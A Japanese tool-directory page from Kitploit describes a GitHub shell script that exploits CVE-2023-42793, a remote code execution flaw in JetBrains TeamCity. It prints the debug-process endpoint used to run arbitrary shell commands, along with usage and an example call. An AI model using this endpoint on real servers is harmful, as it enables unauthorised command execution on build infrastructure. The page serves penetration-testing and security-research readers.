Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
teamcity-exploit-cve-2023-42793 — teamcity-exploit-cve-2023-42793 | Kitploit
ツール/GitHubGitHub/swiftsecur/teamcity-exploit-cve-2023-42793
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubswiftsecur/teamcity-exploit-cve-2023-42793

teamcity-exploit-cve-2023-42793

teamcity-exploit-cve-2023-42793

リポジトリを見る
1111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

TeamCity エクスプロイト Cve 2023 42793

cve-2023-42793 の脆弱性を悪用するための簡単なスクリプトです。このエクスプロイトに関する追加の参考資料はこちら:

https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793​

https://www.cnblogs.com/LittleHann/p/17843271.html​

このスクリプトは、RCE 脆弱性をトリガーした後に "params" を自由に使ってコマンドを実行する機能を追加します:

RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh&params=-c&params=${URLCMD}"

スクリプトを実行するには:

Usage: <base_url> <port> <command>

例:

./TeamCity.sh blah.com 8111 "ls -lah"

オリジナルスクリプトはこちらです。クレジットはすべて作者に帰属します: https://github.com/Zenmovie/CVE-2023-42793

ツールをダウンロード